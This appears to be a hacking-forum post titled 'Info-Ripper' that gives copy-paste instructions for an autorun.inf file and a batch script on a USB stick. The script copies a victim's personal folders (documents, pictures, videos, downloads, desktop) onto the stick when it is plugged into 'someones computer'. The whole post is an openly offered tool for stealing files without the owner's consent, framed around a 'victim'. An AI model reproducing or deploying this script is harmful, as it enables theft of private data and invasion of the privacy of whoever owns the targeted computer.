> Info-Ripper:- Rip anything from your victim's PC
What this will do is once setup, you could just plug in your usb into someones computer and select what you want to rip and copy it to your usb to view.
1. Copy/Paste to notepad save as autorun.inf to your usb
CODE
[autorun]
open=rip.bat
action=Rip folders off user
2. Copy/Paste to notepad save as rip.bat to your usb
CODE
@echo off
if exist "A:\" set drive=A
if exist "B:\" set drive=B
if exist "F:\" set drive=F
if exist "G:\" set drive=G
if exist "H:\" set drive=H
if exist "I:\" set drive=I
if exist "J:\" set drive=J
if exist "K:\" set drive=K
if exist "L:\" set drive=L
if exist "M:\" set drive=M
if exist "N:\" set drive=N
if exist "O:\" set drive=O
if exist "P:\" set drive=P
if exist "Q:\" set drive=Q
if exist "R:\" set drive=R
if exist "S:\" set drive=S
if exist "T:\" set drive=T
if exist "U:\" set drive=U
if exist "V:\" set drive=V
if exist "W:\" set drive=W
if exist "X:\" set drive=X
if exist "Y:\" set drive=Y
if exist "Z:\" set drive=Z
:start
set /p ask=Rip Documents, Music, Pictures, Videos, Downloads, or Desktop:
if %ask% equ Documents goto docs
if %ask% equ documents goto docs
if %ask% equ Music goto mus
if %ask% equ music goto mus
if %ask% equ Pictures goto pic
if %ask% equ pictures goto pic
if %ask% equ Videos goto vid
if %ask% equ videos goto vid
if %ask% equ Downloads goto dow
if %ask% equ dowloads goto dow
if %ask% equ Desktop goto des
if %ask% equ desktop goto des
echo Incorrect choice
goto start
:docs
xcopy /e "%userprofile%\documents" "%drive%:\%username%s Documents"
if errorlevel 1 goto error
echo Rip successful, Rip another? (yes/no)
set ask2=yes or no:
if %ask2% equ yes goto start
exit
:mus
xcopy /e "%userprofile%\music" "%drive%:\%username%s Music"
if errorlevel 1 goto error
echo Rip successful, Rip another? (yes/no)
set ask2=yes or no:
if %ask2% equ yes goto start
exit
:pic
xcopy /e "%userprofile%\pictures" "%drive%:\%username%s Pictures"
if errorlevel 1 goto error
echo Rip successful, Rip another? (yes/no)
set ask2=yes or no:
if %ask2% equ yes goto start
exit
:vid
xcopy /e "%userprofile%\Videos" "%drive%:\%username%s Videos"
if errorlevel 1 goto error
echo Rip successful, Rip another? (yes/no)
set ask2=yes or no:
if %ask2% equ yes goto start
exit
:dow
xcopy /e "%userprofile%\downloads" "%drive%:\%username%s Downloads"
if errorlevel 1 goto error
echo Rip successful, Rip another? (yes/no)
set ask2=yes or no:
if %ask2% equ yes goto start
exit
:des
xcopy /e "%userprofile%\desktop" "%drive%:\%username%s Desktop"
if errorlevel 1 goto error
echo Rip successful, Rip another? (yes/no)
set ask2=yes or no:
if %ask2% equ yes goto start
exit
:error
echo An error has occured during execution.
ping localhost -n 2 >nul
exit
3. Make sure both rip.bat and autorun.inf are in the same directory and you're done. All you have to do is plug this in to someones computer and choose an option.
|